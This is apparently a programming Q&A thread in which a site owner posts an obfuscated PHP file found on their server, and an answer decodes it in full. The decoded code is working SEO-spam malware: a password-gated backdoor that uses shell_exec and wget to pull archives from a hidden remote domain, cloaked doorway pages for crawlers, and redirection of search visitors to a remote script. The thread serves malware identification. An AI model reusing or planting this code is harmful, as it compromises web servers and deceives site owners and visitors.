# I found this wierd PHP file on my server, It seems that it sabotaged our SEO in our sites. Does anybody know what it does?

Tags: php, apache, ftp, seo

I am not sure how it got there, but I was wondering if anybody has seen anything like this, all this did was to sabotage our SEO by giving a 500 Internal Server Error every time a link from our site in google linked to our site.

```
<?php $kcasqw="\x63"."r".chr(101).chr(97).chr(116)."e"."\x5f"."\x66"."u"."n"."c".chr(116)."i"."\x6f"."n";$piglny = $kcasqw('$a',strrev(';)a$(lave')); $piglny(strrev(';))"=oQD9lQCK0QfJkQCK0gCNsjZ1JGJg8GajVWCJkQCK0QfJkQCJoQDJkQCJkgCNkQCJkQC9lQCJkQCK0QfJkQCJkQCK0wOt0yYkkQCJkQCJkgCNsTKmVnYkwydl5GJswWY2RCKlNWYsBXZyl2XyR3c9YWdiRSCJkQCJkQCK0wOn4TYvwzJuI3boNmbhRiLn4jIn4Cbk4yJi0jZlJHagEGPn0zdl5GJJkQCJkQCJoQD7kSKdNGJbN3aulGbkgSbpJHdsICf8xnIoUGZvxGc4VWPpI3boNmbhRCLsRCK0NXaslQCJkQCJkgCNszahVmcilCM8MGJoAiZplQCJkQCJkgCNsXKsFmdkAychBCbhZnekgCajFWZy9mZJkQCJkQCK0wOpwWY2pHJoUGbmZWdoNXCJkQCJkgCNsTXws1clh2Y0FWbk0DbhZnekkQCJkQCJoQD7BSKpMXZoNGdh1GJgwiZ1JGJgwiIVl2cvAHeldWZyRyLigCbsF2XoNGdh12XnVmcwhiZplQCJkQCK0wOi4TYvwFPpoiLo4jKd5jXbFDXclyPq0lPgICXetFKp8zPiwFK9YWZyhmKd5jXbNHXhxjIg0DIwhXZnVmckkQCJkQCK0wOwITPjRSKwIjPjRCKgYWaJkQCJkgCNsTKztmbpxGJoUGbmZWdoNXCJkQCJoQD7ETLpM3aulGbkgCduV3bjBUPjRSCJkQCJoQD7kyUF5USM91VF50XFJ1TOdUSfVETJZEfTVkTJx0XZRFUNV0XQl0ST9VRMlkRsgnc1NGJoUGbpZGQ9M3aulGbkkQCJkQCK0wepkCeyV3Ykgyc0NXa4V2XlxWamBEKgYWaJkQCJoQD7IyczV2cuYmZmJiLylGZjRSP4JXdjRSCJkQCK0gCNsTKsJXdyNGJowmc1N2X5J2XldWYw9FdldWPmVnYkkQCJkgCNsTXnkkUV9FVTVUVRVkUnslUFZlUFN1XkAkLddCVT9ESfBFVUh0JbJVRWJVRT9FJA5iIv8iOwRHdoJSPsJXdyNGJJkQCJoQDK0gCNsXZzxWZ9lQCJoQD7QXa4VWCJkQCK0wOn4DbtRHavwjP5R2bi9CPnAyboNWZJkQCJoQD7IibcJCIuAyJ+M3clJHZkF2L8ADOgQncvBFInAiLg01JUN1TI9FUURFSnslUFZlUFN1XkAiLgcCI0FGIyVmdyV2UgcCIuASKo42bpNnclZHcoBHIuAyJvAFSQByJg4CIddSRSF0VUZ0TT9lUFZlUFN1JbJVRWJVRT9FJg4CIn4zczVmckRWY8cCIvh2YllQCJkgCNsjIuxlIg4CIn4jcoxzJg8GajVWCJkQCK0wOi4GXiAiLgciPw9CPuIXZ2JXZzBycphGdg42bgQmb19mZgQ3buBychdHInAiLg01JJJVVfR1UFVVUFJ1JbJVRWJVRT9FJg4CInACTSVFIkVGdzVWdxVmcgUGaU5Dc8cCIvh2YllQCJkgCNsjIuxlIg4CIn4TMo9CPk5WdvZEI09mT+EDa8cCIvh2YllQCJkgCNsjIuxlIg4CIn4Tek9mY84DZhVGavwzJg8GajVWCJkQCK0wOi4GXiAiLgciPlxGdpR3L8Qmb19mRgQ3bOBCNwQjPlxGdpRHPnAyboNWZJkQCJoQD7IibcJCIuAyJ+QWYlhGP+wWb0hGPnAyboNWZJkQCJoQD7IibcJCIuAyJ+IiTF9yLw4iMgwUTUhEIERFRv8iRUVUSv8SLiAyQJxkQVBFIM1EVIBSRQlFVD9ERhwzJg8GajVWCJkQCK0wOpICZuV3bGBCdv5EI0ADNgICIuASXnw0TD9EVPJFUfJVRWJVRTdyWSVkVSV0UfRCKyVGZhVGaJkQCJoQDK0Qf7QXa4V2Op0lIU5URHF0XSV0UV9FUURFSislUFZlUFN1XkAELdJiUERUQfVEVP1URSJyWSVkVSV0UfRiLi0jckRWYmIiL4JXd1QWbk4iI9UnJi4Cdz9Ga1QWbk4iI9QmJi4SKr1GJoUGZvNmblxmc1dXYy5iI9sWbmIiLrNWYwRUSk4iI9AXa/AHaw5Ccs9ibpFWbvRGJv8iOwRHdoJCKsJXdj9Vei9VZnFGcfRXZnByboNWZ7BSKlNHJoAiZplQCJkgCN0XCJkQCK0wO0lGeltDduVGdu92Yy92bkRCIvh2YllQCJkQCK0QfJkQCJkgCN0XCJkQCJkgCNsTKsFmdkgiclRWYlhWKiISPhwWY2RCKmlWCJkQCJkQCK0wOpwWY2RCKtlmc01DbhZHJJkQCJkQCJoQD7lCbhZHJgMXYgMXZwlHdkgCajFWZy9mZJkQCJkQCK0wOpUGc5RHduVGdu92YkwiIuxlIoUGZvxGc4VWPzVGc5RHJJkQCJkQCK0wOpUGc5RHduVGdu92YkgSZk92YlR2X0YTZzFmYA1TZwlHd05WZ052bjRSCJkQCJkgCNsXK00TPmRGckgCImlWCJkQCJoQD9lQCJkQCK0wOpICbth3L0hXZ0BiOlBXeU1CduVGdu92QigiclRWYlhWCJkQCJkgCNsXKz0TPmRGckgCImlWCJkQCJoQD9lQCJkQCK0wOpIyZuB3LldWYtlGI6UGc5RVL05WZ052bDJCKyVGZhVGaJkQCJkQCK0wepITP9YGZwRCKgYWaJkQCJkgCN0XCJkQCJoQD7kiImRGcv42bpRXYjlGbwBXYgoTZwlHVtQnblRnbvNkIoIXZkFWZolQCJkQCJoQD7lSM90jZkBHJoAiZplQCJkQCK0wOw0zKmRGckkQCJkQCK0wegkCdvJGJoAiZplQCJkgCNsTM9U2ckkSKdBiISVkUFZURS9FUURFSislUFZlUFN1XkAEIsISaj02bj5CXu9Gb5JWYixXbvNmLcVmZhNWek5WYoxXbvNmLch2YyFWZzJWZ3lXb812bj5CX392d8RXZu5CXyVGdyFGajxXbvNmLcRXa1RmbvNGfv9GahlHfoNmchV2c8FGdzlmdhRHbhxXbvNmLcx2bhxXbvNmLct2chxXbvNmLc52ctxXbvNmLcdmbpJGflx2Zv92ZjICKoNGdh12XnVmcwhCImlWCJkQCK0wOx0TZslmYv1GJpkSXgICVOV0RB9lUFNVVfBFVUhkIbJVRWJVRT9FJABCLik2Ip5WatxXai9Wb8BHZp1GfwF2d8VmbvhGc8VGbpJ2btxHM2MXZpJXZzxHZhBXa8VmbvhGcpxnbhlmYtl3c8RWavJHZuF2IigCajRXYt91ZlJHcoAiZplQCJkgCNsTM9Q3biRSKp0FIiQlTFdUQfJVRTV1XQRFVIJyWSVkVSV0UfRCQgwiIpNiclRWawNXdklWYixnclx2dhJ3Y8VncuwFbpFWb8dXZpZXZyBHIiV2dgUGbn92bnx3bvhWY5xHdvJGfyVGZpB3c8VGbpJ2bN1CdvJWZsd2bvdEfzJXZuRnchBXYpRWZNxXZsd2bvdUL09mQzRWQ8JXZsdXYyNWLhN3Z8VGbn92bnNiIog2Y0FWbfdWZyBHKgYWaJkQCJoQD7ATPlxWai9WbkkQCJkgCNsDM9U2ckkQCJkgCNsDM9Q3biRSCJkQCK0QCJkQCK0wOpQnblRnbvNmcv9GZkgSZk92YlR2X0YTZzFmYA1DduVGdu92Yy92bkRSCJkQCK0wOpkCeyV3Ykgyc05WZ052bj9Fdld2XlxWamBELiwHf8JCKlR2bsBHelBUPpUGc5RHduVGdu92YkwiZkBHJsQnblRnbvNmcv9GZkwyatRCLrNWYwRUSkgCdzlGbAlQCJkgCNsXKpgnc1NGJoMHdzlGel9VZslmZAhCImlWCJkgCNsDeyVXNk1GJuIXakNGJ9gnc1NGJJkQCK0welNHbl1XCJoQD9lQCJoQD7QXa4V2Oi4GXjMyIEV0SS90VjMyIiAyboNWZJkQCJoQD7liIzISP9gHJoAiZplQCJoQD9lQCJoQD7QXa4VWCJkQCK0wOpQWbjRCKjVGel9FbsVGazByboNWZJkQCJoQD9lQCJkgCNsjI6dGduEDImJXLg0mcgsjenRnLxAiZ6hXLgIXY0ByO6dGduEDIP1CI6dGduIiLhBHJuIyXi4Cdz9Ga1QWbk4iIvMmch9ibpFWbvRGJuUGdhRGc19yL6AHd0hGI0V2Z3ByOoRXYwBXb0RCIkNmI9QWbjRSCJkQCJoQD7ATPrEGckkQCJkQCK0wepIiI9ESYwRCKgYWaJkQCJoQD7IienRnLxAiZy1CItJHI7o3Z05SMgYme41CIyFGdgsjenRnLxAyTtAienRnL0N3boVDZtRyLjJXYv4Wah12bkRiLlRXYkBXdv8iOwRHdoBCdld2dgsDa0FGcw1GdkACZjJSPk12YkkQCJkgCN0XCJkQCK0wOpQWbjRCKjVGel9FbsVGazByboNWZJkQCJkgCNsjI0N3boVDZtRiLgYmctASbyByOoRXYwBXb0RCIkNmI9QWbjRSCJkQCJoQD7liIyISP9gHJoAiZplQCJkgCNsjIux1IjMyUFxUSG91ROlEVBREUVNyIjICIvh2YllQCJkgCNsXKpICNi0TP4RCK8xXKiIjI90DekgCKgYWaJkQCK0gCNsTXiEGcisFVT9EUfRCQ9EGckkQCJoQD74mc1RXZylyczFGc1QWbk0TIwRCKgYWaJkQCK0wOpkSXiAnIbR1UPB1XkAEKlR2bjVGZfRjNlNXYihSNk1WPwRSCJkgCNsXKiISPhgHJoAiZplQCK0gCNsTKiQXOykVdFdVZ1J1VkVTNXpFd1kmWigSZk92YlR2X0YTZzFmY94Wah12bkRSCJoQD7IyLi4Cdz9Ga1QWbk4iIu8iIugGdhBHctRHJ9IXakNGJJkgCNoQD9tTKp81XFxUSG91XoUWbh5mcpRGKg0DIoRXYwBXb0RCI7BSZzxWZg0XC9lwOpkyXfVETJZ0XfhSZtFmbylGZoASPggGdhBHctRHJJsXKpgGdhBHctRHJoIXak91cpFCKgYWa7kCKylGZfBXblR3X0V2ZfNXezBSPggGdhBHctRHJ7BSKpcicpR2Xw1WZ09Fdld2Xzl3cngyc0NXa4V2Xu9Wa0Nmb1ZGKgYWaJkgCNoQD7kCeyVHJoUDZt1DeyVXNk1GJJkgCNsTayVHJuQ3cvhGJ9gnc1RSCJoQD7kCdz9GakgSNk1WP0N3boVDZtRSCJoQD7kCdz9GakwiIiwiIuc3d3JCKlNWYsBXZy9lc0NXP0N3boRSCJoQD70lIJJVVfR1UFVVUFJlIbJVRWJVRT9FJA1TayVHJJkgCNsTXiQ1UPh0XQRFVIJyWSVkVSV0UfRCQ9Q3cvhGJJkgCNoQD7IiYzQTZmFGMyUTMlN2M4ETYwYWYwIDOygTMwcTN0UWNlJSPzNXYwVDZtRSCJoQD70lIrNWZoN2XwBHcwJyWUN1TQ9FJA1DekkQCK0wOiISP05WZ052bjJ3bvRGJJkgCNoQD9pQD7QHb1NXZyRCIuJXd0VmcJkgCNsTKoNGJoU2cvx2Yfxmc1NWCJoQD7kCajRCKgMWZ4V2XsJXdjBSPgQHb1NXZyRSCJoQD7kCduV2ZhJXZzVHJgwCVOV0RBJVRTV1XUB1TMJVVDBCLoNGJoACdw9GdlN3XsJXdjlQCK0wOpADIsQ1UPhUWGlkUFZ1XMN1UfRFUPxkUVNEIsg2YkgCI0B3b0V2cfxmc1NWCJoQD7kCMgwiUFVEUZZUSSVkVfx0UT9FVQ9ETSV1QgwCajRCKgQHcvRXZz9FbyV3YJkgCNsTKwMDIsQVVPVUTJR1XUB1TMJVVDBCLoNGJoACdw9GdlN3XsJXdjlQCK0wOpEDIsIVRGNlTBJFVOJVVUVkUfRFUPxkUVNEIsg2YkgCI0B3b0V2cfxmc1NWCJoQD7kCbyVHJswkUV9FVQ9ETSV1QgwCajRCKgQHcvRXZz9FbyV3YJkgCNsTKoACdp5Wafxmc1NGI9ACajRSCJoQD7liI2MjL3MTNvkmchZWYTBSMzEjL3QDOx4CMuQzMvUWbvJHaDBSKvt2YldEIltWasBCLM1EVItEKgYzMuczM18CdptkYldVZsBHcBBSK0YzVPdFI7EjL2ACVOByc39GZul2VoACMuUzLhxGbpp3bNJSP05WZnFmclNXdkwCbyVHJowmc1N2X5J2XldWYw9FdldGIu9Wa0Nmb1ZmCNoQD7kCMoQXatlGbfVWbpR3X0V2c"(edoced_46esab(lave'));?>
```

Comment: I would assume your site may be have been hacked and change all passwords.

Answer (score 4, accepted):

Phew, was not easy but this is the decoded function :

```
<?php

set_time_limit(0);

function get_page_by_curl($url,$useragent="Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36"){
        $ch = curl_init ();
        curl_setopt ($ch, CURLOPT_URL,$url);
        curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt ($ch, CURLOPT_TIMEOUT, 30);
        curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
        curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
        curl_setopt ($ch, CURLOPT_USERAGENT, $useragent);
        $result = curl_exec ($ch);
        curl_close($ch);
        return $result;
}

        $doorcontent="";
        $x=@$_POST["pppp_check"];
        $md5pass="e5e4570182820af0a183ce1520afe43b";

        $host=@$_SERVER["HTTP_HOST"];
        $uri=@$_SERVER["REQUEST_URI"];
        $host=str_replace("www.","",$host);
        $md5host=md5($host);
        $urx=$host.$uri;
        $md5urx=md5($urx);

        if (function_exists('sys_get_temp_dir')) {$tmppath = sys_get_temp_dir();if (!is_dir($tmppath)){ $tmppath = (dirname(__FILE__)); }   } else { $tmppath = (dirname(__FILE__));}

        $cdir=$tmppath."/.".$md5host."/";
        $domain=base64_decode("Zi5tZW55dWRueWEuY29t");

        if ($x!=""){
            $p=md5(base64_decode(@$_POST["p"]));
            if ($p!=$md5pass)return;
            $pa=@$_POST["pa"];

            if (($x=="2")||($x=="4")){
                echo "###UPDATING_FILES###\n";
                if ($x=="2"){
                    $cmd="cd $tmppath; rm -rf .$md5host";
                    echo shell_exec($cmd);
                }
                $cmd="cd $tmppath; wget http://update.$domain/arc/$md5host.tgz -O 1.tgz; tar -xzf 1.tgz; rm -rf 1.tgz";
                if ($pa!=""){
                    $pa+=0;
                    $cmd="cd $tmppath; wget http://update.$domain/arc/".$md5host."_".$pa.".tgz -O 1.tgz; tar -xzf 1.tgz; rm -rf 1.tgz";
                }
                echo shell_exec($cmd);
                exit;
            }
            if ($x=="3"){
                echo "###WORKED###\n";exit;
            }
        }else{
            $curx=$cdir.$md5urx;
            if (@file_exists($curx)){
                @list($IDpack,$mk,$doorcontent,$pdf,$contenttype)=@explode("|||",@file_get_contents($curx));
                $doorcontent=@base64_decode($doorcontent);

                $bot=0;
                $se=0;
                $mobile=0;
                if (preg_match("#google|gsa-crawler|AdsBot-Google|Mediapartners|Googlebot-Mobile|spider|bot|yahoo|google web preview|mail\.ru|crawler|baiduspider#i", @$_SERVER["HTTP_USER_AGENT" ]))$bot=1;
                if (preg_match("#android|symbian|iphone|ipad|series60|mobile|phone|wap|midp|mobi|mini#i", @$_SERVER["HTTP_USER_AGENT" ]))$mobile=1;
                if (preg_match("#google|bing\.com|msn\.com|ask\.com|aol\.com|altavista|search|yahoo|conduit\.com|charter\.net|wow\.com|mywebsearch\.com|handycafe\.com|babylon\.com#i", @$_SERVER["HTTP_REFERER" ]))$se=1;
                if ($bot) {
                    $pdf+=0;
                    if ($pdf==1){
                        header("Content-Type: application/pdf");
                    }
                    if ($pdf==2){
                        header("Content-Type: image/png");
                    }
                    if ($pdf==3){
                        header("Content-Type: text/xml");
                    }
                    if ($pdf==4){
                        $contenttype=@base64_decode($contenttype);
                        $types=explode("\n",$contenttype);
                        foreach($types as $val){
                            $val=trim($val);
                            if($val!="")header($val);
                        }
                    }
                    echo $doorcontent;exit;
                }
                if ($se) {echo get_page_by_curl("http://$domain/lp.php?ip=".$IDpack."&mk=".rawurlencode($mk)."&d=".$md5host."&u=".$md5urx."&addr=".$_SERVER["REMOTE_ADDR"],@$_SERVER["HTTP_USER_AGENT"]);exit;}

                header($_SERVER['SERVER_PROTOCOL'] . " 404 Not Found");
                echo '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">' . "\n";
                echo '<html><head>' . "\n";
                echo '<title>404 Not Found</title>' . "\n";
                echo '</head><body>' . "\n";
                echo '<h1>Not Found</h1>' . "\n";
                echo '<p>The requested URL ' . $_SERVER['REQUEST_URI'] . ' was not found on this server.</p>' . "\n";
                echo '<hr>' . "\n";
                echo '<address>' . $_SERVER['SERVER_SOFTWARE'] . ' PHP/' . phpversion() . ' Server at ' . $_SERVER['HTTP_HOST'] . ' Port 80</address>' . "\n";
                echo '</body></html>';
                exit;
            }else{


                $crurl="http://".@$_SERVER['HTTP_HOST'].@$_SERVER['REQUEST_URI'];
                $buf=get_page_by_curl($crurl);

                $curx=$cdir."fff.sess";
                if (@file_exists($curx)){
                    $links=@file($curx,FILE_SKIP_EMPTY_LINES|FILE_IGNORE_NEW_LINES);
                    $c=@count($links)-1;
                    shuffle($links);
                    if ($c>20)$c=20;
                    $regexp = "<a\s[^>]*href=(\"??)([^\" >]*?)\\1[^>]*>(.*)<\/a>";
                    if(preg_match_all("/$regexp/siU", $buf, $matches)) {
                        $zval=$matches[0];
                        shuffle($zval);
                        foreach($zval as $val){
                            if ($c<0)break;
                            list($l,$anchor)=explode("|||",trim($links[$c]));
                            $new='<a href="'.$l.'">'.$anchor.'</a>';
                            $buf=str_ireplace($val,$new,$buf);
                            $c--;
                        }
                    }                   

                }
                echo $buf;

            }
        }
```

Comment: http://stackoverflow.com/questions/29980379/astronautic-benchmark-php-virus-script

Comment: Ow, come on, why downvoting ?

Comment: Simply decoding the script doesn't tell the OP what to do about it.

Comment: @Barmar He didn't asked to do, but what the script was doing

Comment: And just dumping a bunch of code doesn't do that, either. Luckily, the question I linked to has an answer with an explanation of what it's doing.

Comment: oh wow, thanks for doing that, I am basically trying to figure out where it came from. I am not sure if someone logged into our Godaddy and uploaded it, or if it came through a wordpress site being hosted on that same server, the file was on the root in the server.